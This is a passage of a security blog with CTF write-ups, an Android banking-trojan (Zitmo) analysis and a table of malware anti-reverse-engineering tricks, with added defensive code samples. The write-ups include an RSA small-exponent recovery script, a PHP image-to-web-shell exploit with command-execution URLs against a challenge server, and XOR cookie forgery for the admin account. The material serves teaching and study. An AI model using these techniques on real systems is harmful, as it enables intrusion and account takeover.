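            return super().find_class(module, name)
        raise pickle.UnpicklingError("refusing to load global %s.%s" % (module, name))


def unsafe_loads(data):
    """The session backend's behaviour with a pickle serializer."""
    return pickle.loads(data)


def safe_loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data):
    """True if the restricted loader refuses the payload."""
    try:
        safe_loads(data)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("plain pickle.loads ran the gadget, result:", unsafe_loads(MALICIOUS))
    print("restricted loader rejects gadget:", is_rejected(MALICIOUS))
    print("restricted loader accepts session:", safe_loads(BENIGN))
```

In Django itself the cleaner fix is not a restricted unpickler but a serializer that cannot express calls at all: setting SESSION_SERIALIZER to django.contrib.sessions.serializers.JSONSerializer (available from 1.5.3 and the default from 1.6), and keeping SECRET_KEY out of the repository, since with signed cookies the key is the only thing standing between a client and the deserializer.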

Monday, July 8, 2013

CODEGATE 2012 Write Up: Network 200

In this problem, a pcap file is given and we are asked to find the targets of the DDoS.
After listing all IPs sorted by packet count and tracing them one by one, we can find the most suspicious flows.
The first attack targets 109.123.118.42, sending a lot of GET requests.
The second targets 111.221.70.11 and is a SYN flood.
The third attack targets 199.7.48.190, resending a lot of SYNs with sequence number 0.
The last one sends a lot of abnormal HTTP packets.
Combining these four addresses, the key is none_111.221.70.11_109.123.118.42_199.7.48.190_66.150.14.48
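The per-destination triage described above, as an added example written for this note. The packet records are constructed and the addresses are documentation placeholders, not the challenge's; the signals counted (bare SYNs, SYNs with sequence number 0, HTTP GETs, unparseable HTTP payloads) and the 90% thresholds are assumptions.

```python
"""Per-destination DDoS triage over constructed packet records."""
from collections import defaultdict

# Constructed packet records: (src, dst, dst_port, tcp_flags, seq, payload)
PACKETS = (
    [("10.0.0.%d" % i, "192.0.2.10", 80, "PA", 1000 + i, "GET / HTTP/1.1") for i in range(1, 41)]
    + [("10.0.1.%d" % i, "192.0.2.11", 80, "S", 5000 + i, "") for i in range(1, 61)]
    + [("10.0.2.1", "192.0.2.12", 80, "S", 0, "") for _ in range(30)]
    + [("10.0.3.%d" % i, "192.0.2.13", 80, "PA", 7000 + i, "\x00\x01\xff garbage") for i in range(1, 21)]
    + [("10.0.4.1", "192.0.2.20", 443, "S", 9000, ""), ("192.0.2.20", "10.0.4.1", 443, "SA", 1, "")]
)


def triage(packets):
    """Count, per destination, the signals the write-up looked for."""
    stats = defaultdict(lambda: {"packets": 0, "syn": 0, "syn_seq0": 0, "get": 0, "bad_http": 0})
    for _src, dst, port, flags, seq, payload in packets:
        s = stats[dst]
        s["packets"] += 1
        if flags == "S":                       # SYN without ACK
            s["syn"] += 1
            if seq == 0:
                s["syn_seq0"] += 1
        if port == 80 and payload:
            if payload.startswith("GET "):
                s["get"] += 1
            elif not payload.split(" ")[0].isalpha():   # method token is not a word
                s["bad_http"] += 1
    return stats


def classify(s, min_packets=10):
    """Label a destination's traffic; None when nothing stands out."""
    if s["packets"] < min_packets:
        return None
    if s["syn_seq0"] > s["packets"] * 0.9:
        return "SYN flood, sequence number 0"
    if s["syn"] > s["packets"] * 0.9:
        return "SYN flood"
    if s["get"] > s["packets"] * 0.9:
        return "HTTP GET flood"
    if s["bad_http"] > s["packets"] * 0.9:
        return "malformed HTTP flood"
    return None


def suspects(packets):
    """Flagged destinations, sorted by packet count, with the attack label."""
    stats = triage(packets)
    out = [(dst, s["packets"], classify(s)) for dst, s in stats.items()]
    return sorted((x for x in out if x[2] is not None), key=lambda x: -x[1])


if __name__ == "__main__":
    for dst, n, label in suspects(PACKETS):
        print("%-12s %4d packets  %s" % (dst, n, label))
```

The ordinary handshake to 192.0.2.20 never reaches the minimum packet count, which is the simple noise floor that keeps a sort-by-volume triage from flagging every host in the capture.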

PHD CTF Quals 2012 Write Up: Forensic 100

In this problem, a QR code image is given, as in the following picture.


We first use an online scanner to scan this QR code and get the following hex-encoded binary string.
7F454C46010000000000000000004305020003001A0043051A00430504000000B931004305B220CD80252000010093CD803030343330354232323043443830323532303030303130303933434438300A
Saving this string as a file and using the file command, we recognize that it is an ELF executable.
Executing the file, we get the following string as output.
004305B220CD80252000010093CD80
Then with stegsolve, we can extract another string.
328:5261 72211A07 00CE9973 80000D00 00000000 00001566
EFE453AE B7AFEBEB 515C366D 9C07555B 4739CBEE 3217360A
3A52E015 3C7AA47C F3BC9DEA 16A30B98 8B5ABCC2 B98BD56C
8E84EB4A 7CEACF43 74D01FD6 9D98C282 1D05B79B 2CC4D3E6
4CB09081 42566EEA C2862E0A 2BA7C559 7E7FCB77 97051CFE
55C8DF4A 10A93D07 2DC79C64 39C6E44D 9845B267 21A71566
EFE453AE B7AF74E5 062C467D BD49421B 47D68DB8 E7F5.

The first integer, 328, may indicate the length of the message. So we extract the first 328 characters as a file, which is indeed a RAR archive.
To extract the RAR file, we need a password. Hence we use the first string as the password and extract the archive.
It contains secret.txt and the key.
The key is 90f3910ff22f4be0dfa95a2fd6cb8a25

PlaidCTF 2012 Write Up: RSA 200

This is the second problem about breaking RSA. In the previous exercise, RSA was broken because the modulus had already been factored. In this problem, the weakness is the use of a small public exponent.

In this problem, encrypted data is given together with a public key.
Using the RSA Python module, we can read the parameters of the key.
(or use the command: openssl rsa -pubin -in id-rsa.pub -text)
The exponent used is 3, which is very small and increases the risk. Observing that the encrypted message is relatively small too gives us a clue to solving it.

According to the RSA encryption scheme, the formula below
It can be reduced to
With e = 3, we get the following formula
Since we have the values of M and N, while C is the plaintext we need to solve for, only K is unknown. With small M and e, we can expect K to be relatively small.
So we wrote a program that brute-forces K: by checking whether the cube root of the candidate (the ciphertext plus K·N, as in the code below) is an integer, we can find the true K and the key.

from Crypto.PublicKey import RSA
import libnum
import gmpy

# load the public key and print its parameters
pubkey = open('id-rsa.pub').read()
key = RSA.importKey(pubkey)
nkey = key.publickey().n
print("n = %d" % nkey)
print("e = %d" % key.publickey().e)

# the ciphertext file holds the raw encrypted bytes; convert them to an integer
message = open("enc.dat", 'r').read()
ct = libnum.s2n(message.rstrip())
print("ciphertext is %d bits" % libnum.len_in_bits(ct))

# with e = 3 and a small message, plaintext^3 = ct + k*n for a small k:
# try k = 1, 2, ... until ct + k*n is a perfect cube
c = ct
k = 1
while True:
        if k % 10000 == 0 :
                print("k = %d" % k)
        p, exact = gmpy.root(c, 3)        # integer cube root and whether it is exact
        if exact and pow(p, 3, nkey) == ct:
                print(libnum.n2s(int(p)))
                break

        c += nkey
        k += 1
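The same search redone with plain Python integers on a small constructed modulus, so it runs without libnum, gmpy or the challenge files. This is an added example written for this note, not the challenge's code; the modulus, the exponent and the sample messages are constructed. It also shows the limit of the method: once the cube of the message wraps around N many times, the number of K values to try explodes, which is why randomized padding (OAEP) makes a small exponent safe to use.

```python
"""Cube-root recovery of an unpadded RSA message with e = 3 (constructed example)."""

# Constructed toy modulus: product of two small factors chosen for the demo.
N = 1000003 * 1000033
E = 3


def icbrt(x):
    """Largest integer r with r**3 <= x (binary search; exact on big ints)."""
    lo, hi = 0, 1 << ((x.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo


def encrypt(m, n=N, e=E):
    """Textbook RSA without padding: C = M**e mod N."""
    return pow(m, e, n)


def recover(c, n=N, max_k=1000):
    """Try K = 0, 1, 2, ... and check whether C + K*N is a perfect cube.
    Returns (plaintext, K), or None if no K below max_k works."""
    for k in range(max_k):
        candidate = c + k * n
        r = icbrt(candidate)
        if r ** 3 == candidate:
            return r, k
    return None


if __name__ == "__main__":
    for m in (12345, 15000):
        print("m = %d -> recovered %r" % (m, recover(encrypt(m))))
    # 30000**3 is about 27 N, so its cube wraps 26 times; 10 tries cannot find it.
    print("m = 30000 with max_k = 10 ->", recover(encrypt(30000), max_k=10))
```

For a properly padded message the plaintext is as large as N, so its cube wraps roughly N² times and no realistic max_k finds it; the attack only works because the CTF message was tiny.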

Monday, July 1, 2013

ForbiddenBITS CTF 2013 Write Up : Misc 150 Invisible

In this problem, a file is provided. Dumping the file, we observe that it only contains 0x20 and 0x09.
So we guess it is a program in the Whitespace language, and find a compiler and disassembler for Whitespace.
After executing the program, we get the following result.
We learn that this program only accepts certain input. Then we disassemble the program and get its instructions.
The program checks whether the first character is 'w' and the second is 's'. We collect the characters the program reads and execute it with the expected input "wslang", and the key is shown.


Sunday, June 30, 2013

ForbiddenBITS CTF 2013 Write Up : Web 600 Imafreak

Imafreak

In order to practise for the wargame, I chose this problem from ForbiddenBITS CTF 2013 and reconstructed the environment. Although some details of the environment differ, the solution is identical.

Problem Description 

In this problem, a website is provided. It has two pages, view.php and upload.php.
Taking a brief look at upload.php, this page contains a form to upload an image file. With no parameters, view.php only shows the string "wrong id". There is also a hint: "Hint6[Freak]:~)".

Solution

First, following the hint, we can access view.php~ and view the source code, which can be found here.
The following piece of code is vulnerable.

$_GET['id']=str_replace(".","",$_GET['id']);       
$_GET['id']=str_replace("/","",$_GET['id']);
$_GET['id']=str_replace("\\","",$_GET['id']);
if(!empty($_GET['id']) && @file_exists('upload/'.$_GET['id'].'.jpg')){
    $img=file_get_contents('upload/'.$_GET['id'].'.jpg');
    $notFound="";
    $exif_ifd0 = read_exif_data('upload/'.$_GET['id'].'.jpg','IFD0' ,0);
    if (@array_key_exists('Model', $exif_ifd0)) {
        $camModel = $exif_ifd0['Model'];
    } else { $camModel = $notFound; }
        $imgx = 'upload/'.$_GET['id'].'.jpg';
        $imgHand = ImageCreateFromJPEG($imgx);
        $imgSize = GetImageSize($imgx);
        $imgWidth = $imgSize[0];
        $imgHeight = $imgSize[1];
 
        $dd="";
        for ($l = 0; $l < $imgHeight; $l++) {
            for ($c = 0; $c < $imgWidth; $c++) {
                $pxlCor = ImageColorAt($imgHand,$c,$l);
                $pxlCorArr = ImageColorsForIndex($imgHand, $pxlCor);
                $dd.=chr($pxlCorArr["red"]);
            }
        }
        $filex="secretstoreddata/"."secret".($camModel);
        $fp=fopen($filex, 'w');
        fwrite($fp, $dd);
        fclose($fp);
}                                
We can see that this PHP reads the image from the upload directory and saves the red channel of each pixel into the secretstoreddata directory. If we can control both the content and the file extension, we can inject code and execute arbitrary commands.

We start with the file extension, which comes from read_exif_data(). This function returns the EXIF headers of a JPEG file, which carry metadata from the digital camera. Since EXIF data can be modified, we can set the Model field with exiv2 and thereby control the file extension.

The file content can be constructed with an image library such as Python's PIL or PHP's image processing functions. Here we follow the program from this write-up, as follows.
';
$width = strlen($shell);
// create image using true color
$img = imagecreatetruecolor($width, 1);
for ($x = 0; $x < $width; $x++) {
    // get ascii value of shellcode
    $value = ord($shell[$x]);
    // set a pixel using the ascii
    $color = imagecolorexact($img, $value, $value, $value);
    imagesetpixel($img, $x, 0, $color);
}
// save image using 100% quality
imagejpeg($img, 'imafreak.jpg', 100);
// add Model metadata using exiv2 tool
system('src/exiv2 -M "add Exif.Image.Model .php" imafreak.jpg');
?>                      
After executing this PHP program, the JPEG file is generated. Then we access
http://140.113.216.151:10180/Imafreak/view.php?id=imafreak

Next we send a request to the generated PHP program as follows.
http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=ls
We find a key.php file in the secretstoreddata directory, so we read this file and finally get the key.
http://140.113.216.151:10180/Imafreak/secretstoreddata/ea5d2f1c4608232e07d3aa3d998e5135.php?c=cat%20key.php
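The root cause in view.php is that an attacker-controlled EXIF tag becomes the suffix of a file written under the web root, so a Model of ".php" turns pixel data into a script the server executes. The following is an added example written for this note (in Python rather than the challenge's PHP) that puts the unsafe naming beside a hardened version: validate the tag against an allowlist, force a fixed non-executable extension, and store the file outside the web root. The directories are placeholders.

```python
"""Unsafe versus hardened naming of a file derived from EXIF metadata (constructed example)."""
import os
import re

WEB_ROOT = "/var/www/imafreak"                 # placeholder
STORE_DIR = "/var/lib/imafreak/secrets"        # placeholder, outside the web root
MODEL_RE = re.compile(r"[A-Za-z0-9 _.-]{1,64}")


def unsafe_secret_path(cam_model):
    """What the PHP does: 'secret' + Model, so the uploader picks the extension."""
    return os.path.join(WEB_ROOT, "secretstoreddata", "secret" + cam_model)


def safe_secret_path(cam_model):
    """Validate the tag, normalise it, force a fixed extension and confirm
    the result stays inside STORE_DIR."""
    if cam_model is None or not MODEL_RE.fullmatch(cam_model):
        raise ValueError("rejected camera model tag")
    if cam_model.startswith("."):
        raise ValueError("rejected camera model tag")   # no bare extensions or dotfiles
    name = "secret_" + re.sub(r"[^A-Za-z0-9]+", "_", cam_model).strip("_") + ".bin"
    path = os.path.normpath(os.path.join(STORE_DIR, name))
    if os.path.dirname(path) != STORE_DIR:
        raise ValueError("path escapes the storage directory")
    return path


def rejects(cam_model):
    """True if the hardened function refuses this tag."""
    try:
        safe_secret_path(cam_model)
    except ValueError:
        return True
    return False


def is_served_as_script(path):
    """True when the web server would treat the file as PHP code."""
    return path.startswith(WEB_ROOT + os.sep) and path.endswith(".php")


if __name__ == "__main__":
    for tag in ("Canon EOS 5D", ".php", "../../etc/cron.d/x", "NIKON D90.php"):
        if rejects(tag):
            print("%-22r -> rejected" % tag)
        else:
            print("%-22r -> %s" % (tag, safe_secret_path(tag)))
```

Even "NIKON D90.php" is accepted but becomes secret_NIKON_D90_php.bin in a directory the web server never serves, so the extension trick has nothing to attach to; the content trick (code smuggled in pixel values) is harmless once the output can never be executed.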

 

note

On July 16, 2013, a technical blog post described a piece of malware that employs a similar technique.
http://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html

Sunday, June 23, 2013

Android Malware Zitmo Analysis

Zitmo

Zitmo is an Android bot that aims to steal users' bank authentication tokens. What is interesting is Zitmo's ability to beat two-factor authentication.

To counter traditional banking trojans, online banking services employ transaction authentication numbers (TAN), a two-factor authentication mechanism, to authorize users.

Zitmo is the mobile version of the Zeus bot, which gives Zeus a chance to defeat two-factor authentication.

In two-factor authentication, the online bank first requests the user's mobile number. After the user authenticates with the traditional password mechanism, a message containing a secondary password is sent to the user's mobile. Only a user with both passwords can authenticate successfully and complete a transaction.

The following figure describes how Zitmo works:
First, Zeus infects the user's computer. Once the user connects to the online bank after infection, the connection is hijacked. All of the user's input is sent to the bot server, including the phone number used for authentication. The bot server then sends a forged message to the user's mobile asking them to install an app, which is in fact the Zitmo bot. Once the user installs it, all messages are hijacked too. Hence the secondary password is sent to the bot server, and the attacker is able to perform bank transactions.

Let's take a brief look into Zitmo.
In the manifest, we can observe the following sections.
Zitmo requests permission to receive and send messages.


Zitmo also registers a receiver triggered once the phone boots or reboots.

We can observe that Zitmo registers a receiver that intercepts messages with the highest priority (MAX_INTEGER), so it can hijack the user's incoming messages.


The core part of Zitmo is in the following figure. When a message arrives, onReceive() is called, which calls snedSmsIfEnabled() to forward the SMS to the attacker.




Reference

DEFCON 21 CTF Write Up:gnireengine 1

gnireengine 1:policebox

In this problem, we got two files: an executable named policebox and a core dump of policebox.
Examining the core dump, we found that it was generated a few instructions after the main function. Since we need information about getchar(), there seems to be no clue to continue.
Then we use readelf to check what is inside the core file.
We notice that a section named precord exists, which indicates that the core dump contains a program execution record logged by gdb's Process Record feature.
Therefore we first replay this record with gdb and disassemble the program. getchar() is located at 0x08048690, where we can set a breakpoint later.
After setting the breakpoint, we continue the replay. The program then halts in getchar() and we can print the value of eax, which is the user's input.
Collecting all the input values, the key is shown.
The key is: w0rlds.w0rst.k3yl0gger!

reference

Wednesday, June 19, 2013

DEFCON 21 CTF Writeup:3dub 1

3dub 1:badmedicine

In this problem, we only see a login form.








After we log in with some username, we get the login successful page.
But it shows that "the key is only for the admin".
And if we try to log in as admin, the message "admin login disabled" is shown.
Then we go back to logging in with another account and observe the behavior of the web page with Tamper Data.
With Tamper Data, we observe that the cookie "username" was set.

After trying to log in with different usernames:
admin1 : 09c8259ca01f
admiN  : 09c8259c80
we can see that most of the cookie is the same and it differs only slightly.
Therefore we can guess that the cookies are encrypted with the XOR operator.
Finally we can find the cookie of admin:
admin : 09c8259ca0
Then we change the value of the cookie and resend the page to get the key.
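The reasoning above, worked through in code as an added example that is not part of the original writeup: from the two username/cookie pairs quoted in the post the script recovers the fixed XOR key stream byte by byte (and would raise if the pairs disagreed, which would mean the XOR guess is wrong), reproduces the admin cookie, and then shows the hardened form a defender would use instead, an HMAC-signed cookie under a server secret. The HMAC scheme and the secret are assumptions of this example, not anything from the challenge.

```python
import hashlib
import hmac

# Username -> hex cookie pairs quoted in the writeup above.
SAMPLES = {
    "admin1": "09c8259ca01f",
    "admiN": "09c8259c80",
}


def recover_keystream(samples):
    """Derive the fixed XOR key stream from known plaintext/cookie pairs.

    Every sample contributes key byte i = plaintext[i] ^ cookie[i]. If two
    samples disagree at the same offset, the cookie is not a fixed-key XOR
    and the guess in the writeup would be wrong, so we fail loudly.
    """
    stream = {}
    for user, hexcookie in samples.items():
        cookie = bytes.fromhex(hexcookie)
        for i, (p, c) in enumerate(zip(user.encode(), cookie)):
            k = p ^ c
            if stream.setdefault(i, k) != k:
                raise ValueError("inconsistent key byte at offset %d" % i)
    return bytes(stream[i] for i in range(len(stream)))


def xor_cookie(username, keystream):
    """The weak scheme: username XORed with a fixed key stream, hex encoded.

    It is malleable: anyone who knows one (username, cookie) pair learns the
    key bytes and can produce a valid cookie for any other name of that length.
    """
    return bytes(p ^ k for p, k in zip(username.encode(), keystream)).hex()


# Hardened form (an assumption of this example): keep the username readable
# and bind it to an HMAC under a server-side secret, so the client cannot
# produce a valid cookie for a name it never logged in as.
SECRET = b"constructed-server-secret-do-not-reuse"


def sign_cookie(username, secret=SECRET):
    tag = hmac.new(secret, username.encode(), hashlib.sha256).hexdigest()
    return "%s.%s" % (username, tag)


def verify_cookie(cookie, secret=SECRET):
    """Return the username if the tag verifies, otherwise None."""
    username, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, username.encode(), hashlib.sha256).hexdigest()
    # Constant-time comparison so the tag cannot be guessed byte by byte.
    return username if hmac.compare_digest(tag, expected) else None


if __name__ == "__main__":
    ks = recover_keystream(SAMPLES)
    print("key stream:", ks.hex())
    print("cookie for admin:", xor_cookie("admin", ks))
    signed = sign_cookie("alice")
    print("signed cookie:", signed, "->", verify_cookie(signed))
```

The point of the hardened version is that the cookie's validity now depends on a secret the client never sees, so observing cookies for admin1 and admiN no longer helps in forging one for admin; an encrypted cookie without an integrity tag gives neither confidentiality of the key stream nor protection against tampering.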

2013年5月27日 星期一

Anti-Reverse Technique Used in Malware

It is an endless arms race between security experts and hackers. Hackers discover new exploits or new attack vectors, while at the same time security experts try to identify and block those attacks. In order to prevent detection or analysis, attackers employ techniques that hinder reverse engineering and detection. The following picture shows that nearly 90% of malware employs some anti-RE technique.

At Black Hat US 2012, Rodrigo Rubira Branco et al. classified anti-reverse techniques into four types: Anti-Disassembly, Anti-Debugger, Obfuscation and Anti-VM. In this article, I will summarize anti-reverse techniques based on this paper, and discuss each technique in other articles. The distribution of anti-RE techniques is shown below.
This paper also summarizes the packers seen in their observation. As the table shows, the packer most often employed in malware is UPX.


Listed below are well-known packers used by malware, together with the anti-reverse-engineering techniques each packer signature was observed to use.

UPX
  1. UPXV200V290MarkusOberhumerLaszloMolnarJohnReiser
    Anti-VM (SLDT)
    Anti-VM (IN)
    Push Pop Math
    Instruction Counting
    PEB NtGlobalFlag
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
  2. UPXv20MarkusLaszloReiser
    Anti-VM (SLDT)
    Anti-VM (IN)
    Push Pop Math
    Instruction Counting
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SS register
  3. UPX290LZMAMarkusOberhumerLaszloMolnarJohnReiser
    Anti-VM (IN)
    Push Pop Math
    Instruction Counting
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SS register
  4. UPX20030XMarkusOberhumerLaszloMolnarJohnReiser
    Anti-VM (IN)
    Push Pop Math
    Instruction Counting
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
  5. UPX293300LZMAMarkusOberhumerLaszloMolnarJohnReiser
    Anti-VM (IN)
    Instruction Counting
    PEB NtGlobalFlag
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
  6. UPXProtectorv10x2
    Nothing

Armadillo
  1. Armadillov171
    Instruction Counting
    Instruction Substitution (push – ret)
  2. Armadillov1xxv2xx
    Nothing
PECompact
    Anti-VM (STR)
    Anti-VM (SLDT)
    Anti-VM (IN)
    Push Pop Math
    PEB NtGlobalFlag
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SoftICE – Interrupt 1
    Software Breakpoint Detection
    SS register
BobSoftMiniDelphiBoBBobSoft
    Anti-VM (STR)
    Anti-VM (SLDT)
    Anti-VM (IN)
    Push Pop Math
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SoftICE – Interrupt 1
    SS register
ASPack
  1. ASPackv212AlexeySolodovnikov
  2. ASProtectV2XDLLAlexeySolodo
    Anti-VM (IN)
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SS register
  3. ASPackv10803AlexeySolodovnikov
    Anti-VM (IN)
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
  4. ASPackv21AlexeySolodovnikov
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SS register
ProtectSharewareV11eCompservCMS
    Anti-VM (SLDT)
    Anti-VM (IN)
    Instruction Counting
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    Instruction Substitution (push – ret)
ASProtect13321RegisteredAlexeySolodovnikov, ASProtectv12
    Anti-VM (STR)
    Anti-VM (SLDT)
    Anti-VM (IN)
    Push Pop Math
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SoftICE – Interrupt 1
    Software Breakpoint Detection
    SS register
WiseInstallerStub
    Nothing
MaskPEV20yzkzero
    Anti-VM (SLDT)
    Anti-VM (IN)
    Push Pop Math
    PEB's BeingDebugged (Stealth IsDebuggerPresent)
    SS register
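One way to look for several of the listed tricks in a binary, as an added example that is neither from the paper nor from the original post: the scanner below matches the raw x86 encodings of sldt/str with a register operand, the VMware backdoor magic that precedes the IN instruction, PEB access through fs:[0x30] (where BeingDebugged and NtGlobalFlag live), push/ret instruction substitution and int 1. The byte buffer is constructed here from hand-assembled instructions; the pattern names and offsets are the example's own.

```python
import re

# Raw x86 encodings for some of the techniques named in the table above.
# Each entry is a bytes regex. Matches are triage hints only: the same bytes
# occur inside data and in legitimate code (the CRT reads the PEB too).
PATTERNS = {
    # 0F 00 /0 with a register operand: sldt ax .. sldt di
    "Anti-VM (SLDT)": re.compile(rb"\x0f\x00[\xc0-\xc7]"),
    # 0F 00 /1 with a register operand: str ax .. str di
    "Anti-VM (STR)": re.compile(rb"\x0f\x00[\xc8-\xcf]"),
    # mov eax, 0x564D5868 ('VMXh'): the magic loaded before "in eax, dx"
    # on the VMware backdoor port; matching the bare IN opcode would be far too noisy
    "Anti-VM (IN, VMware backdoor)": re.compile(rb"\xb8\x68\x58\x4d\x56"),
    # mov eax, fs:[0x30] (64 A1 disp32) or mov r32, fs:[0x30] (64 8B /r disp32)
    "PEB access (BeingDebugged / NtGlobalFlag)": re.compile(
        rb"\x64(?:\xa1|\x8b[\x05\x0d\x15\x1d\x25\x2d\x35\x3d])\x30\x00\x00\x00"),
    # push imm32 ; ret  (an absolute jump written without jmp)
    "Instruction Substitution (push - ret)": re.compile(rb"\x68.{4}\xc3", re.DOTALL),
    # int 1 (SoftICE check)
    "SoftICE - Interrupt 1": re.compile(rb"\xcd\x01"),
}

# Constructed code bytes for the example, hand-assembled; not taken from any sample.
SAMPLE = (
    b"\x55\x8b\xec"                      # push ebp ; mov ebp, esp  (ordinary prologue)
    b"\x0f\x00\xc0"                      # sldt ax
    b"\x64\xa1\x30\x00\x00\x00"          # mov eax, fs:[0x30]      (PEB)
    b"\x0f\xb6\x40\x02"                  # movzx eax, byte [eax+2] (PEB.BeingDebugged)
    b"\xb8\x68\x58\x4d\x56"              # mov eax, 'VMXh'
    b"\xba\x58\x56\x00\x00"              # mov edx, 0x5658
    b"\xed"                              # in eax, dx
    b"\x68\x78\x56\x34\x12\xc3"          # push 0x12345678 ; ret
    b"\x90\x90\xc3"                      # nop ; nop ; ret
)


def scan(buf):
    """Return {technique name: [offsets]} for every pattern found in buf."""
    hits = {}
    for name, pattern in PATTERNS.items():
        offsets = [m.start() for m in pattern.finditer(buf)]
        if offsets:
            hits[name] = offsets
    return hits


def scan_file(path):
    """Scan a whole file; fine for triage, but section-aware scanning cuts noise."""
    with open(path, "rb") as fh:
        return scan(fh.read())


if __name__ == "__main__":
    for name, offsets in scan(SAMPLE).items():
        print("%-45s %s" % (name, ", ".join("0x%x" % o for o in offsets)))
```

Treat the output as a reason to look closer in a disassembler rather than as a verdict: a packed sample hides these instructions until it unpacks, so scanning the on-disk file mainly catches the stub, while a memory dump taken after unpacking shows the payload's own checks.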

Reference

[1]  Rodrigo Rubira Branco, Gabriel Negreira Barbosa, Pedro Drimel Neto "Scientific but Not Academical Overview of Malware Anti-Debugging, Anti-Disassembly and Anti-VM Technologies", Black Hat US 2012

2013年4月3日 星期三

Black Hat Conference : Malware

2012 USA : Scientific but Not Academical Overview of Malware Anti-Debugging, Anti-Disassembly and AntiVM Technologies

2012 USA : File Disinfection Framework (FDF) Striking back at polymorphic viruses

2012 USA : FLOWERS FOR AUTOMATED MALWARE ANALYSIS
2012 USA : HYBRID DEFENSE: HOW TO PROTECT YOURSELF FROM POLYMORPHIC 0-DAYS
2013 Europe : OPTISIG: SEMANTIC SIGNATURE FOR METAMORPHIC MALWARE
2012 Europe : The Kelihos Botnet
2012 Europe : Workshop: Understanding Botnets By Building One
2012 ABU DHABI :  THE ENDLESS GAME, FIGHTING AGAINST KELIHOS BOTNET
2012 ABU DHABI :  REVERSE AND SIMULATE YOUR ENEMY BOTNET C&C

Black Hat Conference : Other


Web Application
2012 USA : HACKING WITH WEBSOCKETS
2012 USA : HTML5 TOP 10 THREATS – STEALTH ATTACKS AND SILENT EXPLOITS

Reverse Engineering
2012 USA : LESSONS OF BINARY ANALYSIS
2012 USA : LINUX INTERACTIVE EXPLOIT DEVELOPMENT WITH GDB AND PEDA
2012 Europe : Entrapment: Tricking Malware with Transparent, Scalable Malware Analysis

Other
2012 USA : OWNING BAD GUYS {AND MAFIA} WITH JAVASCRIPT BOTNETS
2012 USA : PRNG: PWNING RANDOM NUMBER GENERATORS (IN PHP APPLICATIONS)
2012 USA : STATE OF WEB EXPLOIT TOOLKITS
2013 Europe : HARNESSING GP2US - BUILDING BETTER BROWSER BASED BOTNETS
2013 Europe : ASSESSING BYOD WITH THE SMARTPHONE PENTEST FRAMEWORK
2012 ABU DHABI :  THE ART OF CYBERWAR
2012 ABU DHABI :  CYBERCRIME KILL CHAIN VS. EFFECTIVENESS OF DEFENSE LAYERS

Black Hat Conference : Exploit

There are some talks about exploits and vulnerabilities at Black Hat.

2012 USA : A Stitch In Time Saves Nine: A Case Of Multiple OS Vulnerability

2012 USA : DIGGING DEEP INTO THE FLASH SANDBOXES

2012 USA : EASY LOCAL WINDOWS KERNEL EXPLOITATION
2012 USA : EXPLOIT MITIGATION IMPROVEMENTS IN WIN 8
2012 USA : RECENT JAVA EXPLOITATION TRENDS AND MALWARE
2012 Europe : Malicious PDF Analysis
2012 Europe : Data Mining a Mountain of Zero Day Vulnerabilities

Black Hat Conference : Mobile Device


There are some talks about mobile devices at Black Hat.

2012 USA : DEX EDUCATION: PRACTICING SAFE DEX
2012 USA : Adventures in BouncerLand
2012 USA : MAPPING AND EVOLUTION OF ANDROID PERMISSIONS
2013 Europe : NEXT GENERATION MOBILE ROOTKITS
2012 Europe : The Heavy Metal That Poisoned the Droid
2012 Europe : The Mobile Exploit Intelligence Project
2012 ABU DHABI : DROID EXPLOITATION SAGA